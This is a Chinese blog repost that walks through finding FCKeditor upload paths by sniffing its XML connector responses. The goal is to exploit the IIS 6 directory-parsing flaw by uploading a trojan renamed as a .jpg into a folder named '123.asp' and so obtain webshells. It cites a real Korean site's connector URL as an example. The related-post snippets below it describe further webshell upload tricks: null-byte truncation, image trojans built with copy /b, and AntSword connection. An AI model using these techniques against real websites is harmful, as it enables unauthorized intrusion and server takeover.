妙用遨游抓包找fckeditor上传木马路径

最新推荐文章于 2023-04-14 16:12:23 发布
最新推荐文章于 2023-04-14 16:12:23 发布
阅读量307 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/mujj/articles/2052347.html
版权

最近有朋友问我利用Fckeditor上传漏洞并结合2003服务器解析漏洞拿网站webshell的时候总是找不到上传后文件的路径,怎么办呢?相信这个问题应该是很多朋友遇到过的。首先我们来看看Fckeditor的漏洞:

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?typeall&connector=connectors/asp/connector.asp

我们可以通过上面地址来打开一个安装了Fckeditor的网站,开起来后可以看到(1)

2011052021334847.jpg

很多朋友在没有注入漏洞的前提下,恐怕都无法列出fck上传文件的路径吧?
的确,通常很多朋友是在注入网站却无法差异备份出webshell的时候发现了FCK,然后利用Fck的漏洞结合2003解析漏洞,上传得到webshell,或者利用Fck前段时间暴出来的Php文件任意上传漏洞得到webshell。

不过大部分人认为这些漏洞都不过是鸡肋,因为上传了webshell如果无法获取路径。也是白费。
这里提供几种得到路径的办法:

1、访问网站内容,查看所有图片的属性。看看路径和文件名。是否和Fck上传目录里的文件名一样。如果是,则可以确定文件路径。
2、另外一种办法就是我今天要主要讲解的——利用遨游浏览器找出Fckeditor上传木马及文件的路径!

首先:打开遨游的“工具”-“网页嗅探器”(2)

2011052021343714.jpg

然后嗅探文件类型选择所有文件,并且显示嗅探通知(3)

2011052021352164.jpg

然后同样打开

http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?typeall&connector=connectors/asp/connector.asp (4)

2011052021360144.jpg

查看嗅探结果你会发现一条记录是这样的:

http://www.yedream.co.kr/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

浏览器直接开启,发现得到如下结果:(5)

2011052021364485.jpg

熟悉网页程序人一看就知道,这个是Xml
没错!Fck利用xml来列出文件,利用xml的可显性,就为我们的入侵提供的方便!
上面的

<CurrentFolder path="/" url="/data/userfiles/image/" />

很明显的告诉我们当前上传文件所处网站相对路径
于是我们建立123.asp文件夹,在里面上传一个改名为xiaoma.jpg的木马
然后访问网站

http://www.xxx.com/data/userfiles/image/123.asp/xiaoma.jpg (6)

2011052021373063.jpg

接下来就是写入一个大马。顺利得到Webshell了。呵呵。
于是 Fck不再是鸡肋,将给朋友们带来更多的Webshell。O(∩_∩)o…




转载于:https://www.cnblogs.com/mujj/articles/2052347.html

weixin_30276935
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FCKeditor编辑器添加图片上传功能及图片路径问题解决方法
10-26
现在很多CMS系统因为安全原因会把后台编辑器里的上传功能给去除,但这样一来对实际使用过程造成了很多麻烦,今天我们以ASPCMS系统的FCKeditor编辑器为例,说明一下如何增加图片上传功能
【用一句话木马文件上传漏洞挖掘实战】
m0_68563451的博客
03-03 1024
6.使用AntSword(中国蚁剑)管理工具连接一句话,注意连接密码就是一句话里的值。5.成功将一句话木马作为头像上传,右键点击查看图像,可以拿到图片路径。3.点击上传头像,将一句话木马改为图片形式上传,并开启bp抓包。4.在抓包代码中将".jpg"改为".php",返回抓包结果。#用一句话木马文件上传漏洞挖掘实战。1.点击新用户注册,注册一个用户。2.注册成功后点击我的个人资料。打开火狐浏览器,访问目标地址。
文件的读写基本操作
范高伦的博客
09-07 1万+
一、文件是计算机中数据持久化存储的表现形式 读写文件标准操作格式1: 1、打开文件:file1 = open('文件名','读写模式') 2、操作文件 3、关闭文件:file1.close() 文件操作完毕后必须关闭,否则长期保持对文件的连接状态,造成内存溢出的现象发生 读写文件操作格式2: # 1、打开文件 file1 = open('demo.txt','w') # 2、操作文件 file1.write('hello world') # 3、关闭文件 file1.close() 1、打开文件:wi
爬虫入门(1)网页抓包信息查看
啾啾的博客
11-08 1592
爬虫抓包
一句话木马上传常见的几种方法
热门推荐
YidaHu的博客
01-06 3万+
1,利用00截断,brupsuite上传利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。 假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg ,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束,从而将lubr.php.
fckeditor上传文件绝对路径设置方法
10-21
修改FCKEditor上传文件路径为绝对路径,具体方法和所需代码见文档
fckeditor编辑器上传——含有点变成下划线限制的源码包
12-08
fckeditor编辑器上传漏洞,含有点变成下划线限制的源码包,IIS搭建即可。如有侵权请联系CSDN管理员删除
fckeditor php上传文件重命名的设置
10-30
我使用的fckeditor版本是fckeditor2.6.4.fckeditor默认上传文件不没有重命名的,这样的话就很麻烦,有时上传中文的文件或者名称重复的文件就很恼火。
修改fckeditor的文件上传功能步骤
10-30
虽然fckeditor自带了文件上传功能,但感觉自带的不方便使用。
weblogic上传木马路径选择
weixin_30883311的博客
02-03 714
对于反序列化漏洞,如果获得的是系统权限或者root权限,那就没必要上传木马,但如果只是web安装应用的权限,就上传获取更大权限。 上传需要到几个点,获取物理路径,如下面三种: 方法1:把shell写到控制台images目录中 \Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\w...
文件上传漏洞获取服务器,任意文件上传漏洞 getshell 教程
weixin_42366319的博客
08-06 1173
getshell这里通常是指获取webshell权限等这些。什么是webshell?webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。一、什么是 getshell?1、什么是shell?shell就是一个脚本文件,我们通过这个脚本文件来管理或者控制服务器的文件、数据库等信息。2、如何getshell?目的是将脚本文件上传到服务...
图片木马绕过站点上传文件检查
四盘山博客
03-03 4875
第一种方法: 利用copy命令 详细操作为 1.随便一张图片 名字改成1.jpg(名字改为1.jpg只是为了方便记忆和输入 文件的后缀随意 只要是图片的格式就可以了) 2.<%eval request(“keio”)%> 存为1.asp(就是一句话木马) 3.copy 1.jpg /b + 1.asp /a 2.jpg 解释一下代码 复制当前目录下的 1.jpg
文件上传漏洞学习
山兔的博客
04-14 191
假如站点为php的站点,但是只限制了php的后缀格式,我们这里可以利用别的脚本语言都测试一下,因为可能这个服务器可以运行多种语言,虽然概率比较低,但是没有好的绕过办法的时候可以试一下,万一成功了呢,我在项目中就碰到过这种情况。3.上传白名单截断 (有些文件上传处是白名单,后缀名不可以绕,可以利用控制文件名截断的方式去绕过白名单,例如1.jsp%00.jpg)1.目录没有执行权限(通过控制文件名进行///…\跳目录,跳到可以执行脚本语言的目录)利用:截断有一个弊端,只有文件,没有内容。
文件上传漏洞(有点乱)
woo233的博客
08-05 890
因为对于上传文件,不能简单地通过后缀名称来判断文件的类型,因为攻击者可以将可执行文件的后缀名称改为图片或其他后缀类型,诱导用户执行。3)上传的文件需要进行重新命名,使攻击者无法猜想上传文件的访问路径,将极大地增加攻击成本,同时向shell.php.rar.ara这种文件,因为重命名而无法成功实施攻击。删除/禁用JS、修改MIME、等价扩展名、大小写、htaccess、双写、空格、点 ::$DATA、%00截断、 0x00截断、图片马、条件竞争等。2)对上传的文件类型进行白名单校验,只允许上传可靠类型。..
文件包含漏洞
dreamthe的博客
12-08 2016
我觉得对于文件包含我整理算是很全面了,怎么复现的步骤都说的很清楚,主要首先自己在本地搭建网站,不会可以去我博客去。如果我的文章你能完全自己做一下,基本上对于文件包含比较了解,可是花了本姑娘我一下午时间,希望能帮助到大家。
使用木马获取网站的信息(新手,学校靶机)
qq_45808536的博客
09-14 277
上篇写到使用sqlmap获得网站的管理员账户和密码 然后,到网站的管理员网站。 原网站:117.167.136.244:28021 1.后面加/robots.txt: http://117.167.136.244:28021/robots.txt 管理员网站一般是 /admins/ 所以我们进 http://117.167.136.244:28021/admins/login.php 使用之前获取的管理员账户和密码登录 进入正题 1.木马上传点 在附件管理里上传我们的木马文件1.php 上传
fckeditor文件上传
最新发布
10-10
对于fckeditor文件上传,你可以按照以下步骤进行操作: 1. 配置服务器:确保服务器环境支持文件上传功能,包括启用合适的文件上传功能和设置合适的目录权限。 2. 配置fckeditor:在fckeditor的配置文件中,到`config.js`,在其中添加以下代码来启用文件上传功能: ```javascript config.filebrowserUploadUrl = '/upload'; // 这里的 '/upload' 是你服务器上处理文件上传的URL地址 ``` 3. 服务器端处理:在你的服务器上创建一个处理文件上传的脚本(如`upload.php`),该脚本负责接收客户端上传的文件并保存到特定位置。你可以使用服务器端编程语言(如PHP、Python等)来实现该脚本。 下面是一个简单的PHP示例: ```php <?php $uploadDir = '/path/to/upload/directory/'; // 这里替换为你希望存储上传文件的目录 if ($_FILES['upload']['error'] === UPLOAD_ERR_OK) { $tmpName = $_FILES['upload']['tmp_name']; $fileName = $_FILES['upload']['name']; // 检查文件类型、大小等其他验证 if (move_uploaded_file($tmpName, $uploadDir . $fileName)) { // 文件上传成功 echo '文件上传成功'; } else { // 文件上传失败 echo '文件上传失败'; } } else { // 文件上传失败 echo '文件上传失败'; } ?> ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值